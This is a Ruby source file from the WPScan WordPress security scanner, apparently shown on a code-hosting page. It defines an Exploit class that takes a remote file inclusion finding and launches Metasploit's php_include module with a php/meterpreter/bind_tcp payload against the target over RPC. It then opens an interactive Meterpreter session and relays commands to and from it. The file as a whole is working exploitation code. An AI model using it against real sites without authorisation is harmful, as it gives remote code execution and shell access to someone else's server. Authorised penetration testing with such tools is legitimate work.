208 lines
5.2 KiB
Ruby
208 lines
5.2 KiB
Ruby
#!/usr/bin/env ruby
|
|
|
|
#--
|
|
# WPScan - WordPress Security Scanner
|
|
# Copyright (C) 2012
|
|
#
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
#++
|
|
|
|
# This library should contain all methods for exploitation.
|
|
|
|
class Exploit
|
|
|
|
attr_accessor :rhost, :type, :uri, :postdata
|
|
|
|
def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)
|
|
@wp_url = URI.parse(wp_url.to_s)
|
|
@rhost = @wp_url.host
|
|
@path = @wp_url.path
|
|
@type = type
|
|
@uri = uri
|
|
@postdata = postdata
|
|
@session_in_use = nil
|
|
@use_proxy = use_proxy
|
|
@proxy_addr = proxy_addr
|
|
@proxy_port = proxy_port
|
|
start()
|
|
end
|
|
|
|
# figure out what to exploit
|
|
|
|
def start()
|
|
if @type == "RFI"
|
|
puts
|
|
puts "[?] Exploit? [y/n]"
|
|
answer = Readline.readline
|
|
if answer =~ /^y/i
|
|
msf_module = "exploit/unix/webapp/php_include"
|
|
payload = "php/meterpreter/bind_tcp"
|
|
exploit(msf_module, payload)
|
|
else
|
|
return false
|
|
end
|
|
elsif @type == "SQLI"
|
|
end
|
|
end
|
|
|
|
# exploit
|
|
|
|
def exploit(msf_module, payload)
|
|
|
|
exploit_info(msf_module,payload)
|
|
|
|
if @postdata == ""
|
|
result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:PAYLOAD => payload})
|
|
else
|
|
result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:POSTDATA => @postdata, :PAYLOAD => payload})
|
|
end
|
|
|
|
if result['result'] == "success"
|
|
puts "[*] Exploit worked! Waiting for a session..."
|
|
|
|
session_spawn_timer = Time.new
|
|
while sessions.nil? or sessions.empty?
|
|
# wait for a session to spawn with a timeout of 1 minute
|
|
if Time.now - session_spawn_timer > 60
|
|
puts "[ERROR] Session was not created... exiting."
|
|
return false
|
|
end
|
|
end
|
|
|
|
choose_session()
|
|
|
|
input = nil
|
|
while input.nil?
|
|
puts meterpreter_read(last_session_id())
|
|
input = Readline.readline
|
|
if input == "exit"
|
|
kill_session(@session_in_use)
|
|
return false
|
|
end
|
|
meterpreter_write(last_session_id(), input)
|
|
input = nil
|
|
end
|
|
|
|
else
|
|
puts "[ERROR] Exploit failed! :("
|
|
return false
|
|
end
|
|
end
|
|
|
|
# output our exploit data
|
|
|
|
def exploit_info(msf_module,payload)
|
|
info = RpcClient.new.get_exploit_info(msf_module)
|
|
puts
|
|
puts "| [EXPLOIT]"
|
|
puts "| Name: " + info['name']
|
|
puts "| Description: " + info['description'].gsub!("\t", "").gsub!("\n\n","\n").gsub!("\n", "\n| ").chop!
|
|
puts "| [OPTIONS]"
|
|
puts "| RHOST: " + @rhost
|
|
puts "| PATH: " + @path
|
|
puts "| URI: " + uri
|
|
puts "| POSTDATA: " + @postdata if @postdata != ""
|
|
puts "| Payload: " + payload
|
|
puts
|
|
end
|
|
|
|
# not sure if this is needed?! not used.
|
|
|
|
def job_id()
|
|
jobs = RpcClient.new.jobs()
|
|
puts jobs
|
|
end
|
|
|
|
# all sessions and related session data
|
|
|
|
def sessions()
|
|
sessions = RpcClient.new.sessions()
|
|
end
|
|
|
|
# the last active session id created
|
|
|
|
def last_session_id()
|
|
sessions.keys.last
|
|
end
|
|
|
|
# a count of the amount of active sessions
|
|
|
|
def session_count()
|
|
sessions().size
|
|
end
|
|
|
|
# if there is more than 1 session,
|
|
# allow the user to choose one.
|
|
|
|
def choose_session()
|
|
if session_count() >= 2
|
|
puts "[?] We have " + session_count().to_s + " sessions running. Please choose one by id."
|
|
open_sessions = ""
|
|
sessions.keys.each do |open_session|
|
|
open_sessions += open_session.to_s + " "
|
|
end
|
|
puts open_sessions
|
|
use_session = Readline.readline
|
|
puts "Using session " + use_session.to_s
|
|
@session_in_use = use_session
|
|
else
|
|
puts "Using session " + last_session_id().to_s
|
|
@session_in_use = last_session_id()
|
|
end
|
|
end
|
|
|
|
# kill a session by session id
|
|
|
|
def kill_session(id)
|
|
begin
|
|
killed = RpcClient.new.kill_session(id)
|
|
if killed['result'] == "success"
|
|
puts "[-] Session " + id.to_s + " killed."
|
|
end
|
|
rescue
|
|
puts "[] Session " + id.to_s + " does not exist."
|
|
return false
|
|
end
|
|
end
|
|
|
|
# read data from a shell, meterpreter is not classed
|
|
# as a shell.
|
|
|
|
def read_shell(id)
|
|
RpcClient.new.read_shell(id)['data']
|
|
end
|
|
|
|
# write data to a shell, meterpreter is not classed
|
|
# as a shell.
|
|
|
|
def write_shell(id, data)
|
|
RpcClient.new.write_shell(id, data)
|
|
end
|
|
|
|
# read data from a meterpreter session
|
|
# data must be base64 decoded.
|
|
|
|
def meterpreter_read(id)
|
|
Base64.decode64(RpcClient.new.meterpreter_read(id)['data'])
|
|
end
|
|
|
|
# write data to a meterpreter session
|
|
# data must be base64 encoded.
|
|
|
|
def meterpreter_write(id, data)
|
|
RpcClient.new.meterpreter_write(id, Base64.encode64(data))
|
|
end
|
|
|
|
end
|